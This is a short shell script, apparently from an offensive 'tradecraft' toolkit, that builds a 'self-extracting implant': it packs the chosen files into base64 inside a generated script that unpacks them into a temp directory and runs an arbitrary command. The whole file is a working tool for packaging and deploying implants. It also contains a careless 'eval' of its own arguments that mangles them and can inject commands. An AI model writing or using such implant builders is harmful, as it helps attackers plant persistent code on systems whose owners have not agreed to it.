#!/bin/sh
# mkegg.sh — build a self-extracting implant.
# Usage: mkegg.sh <out.sh> <file1> [file2 ...] <run-command>
# The last argument is the command executed after extraction.
# Based on the THC mkegg concept (see tradecraft/04-persistence.md §mkegg).
set -e

if [ $# -lt 3 ]; then
  echo "Usage: $0 <out.sh> <file1> [file2 ...] <run-command>" >&2
  exit 1
fi

OUT="$1"; shift
# last arg = command
eval "set -- $*"
CMD=""
for last; do :; done
# recompute: all but last are files
FILES=""
n=$#
i=0
for a in "$@"; do
  i=$((i+1))
  if [ "$i" -eq "$n" ]; then CMD="$a"; else FILES="$FILES $a"; fi
done

if [ -z "$CMD" ]; then
  echo "No run-command given." >&2
  exit 1
fi

# Build a tar.gz of the files, base64 it, embed in a self-extracting script.
PAYLOAD=$(tar czf - $FILES 2>/dev/null | base64 -w0)

cat >"$OUT" <<EOF
#!/bin/sh
# self-extracting implant generated by mkegg.sh
set -e
D=\$(mktemp -d)
echo "$PAYLOAD" | base64 -d | tar xzf - -C "\$D"
cd "\$D"
$CMD
EOF
chmod +x "$OUT"
echo "Egg built: $OUT"
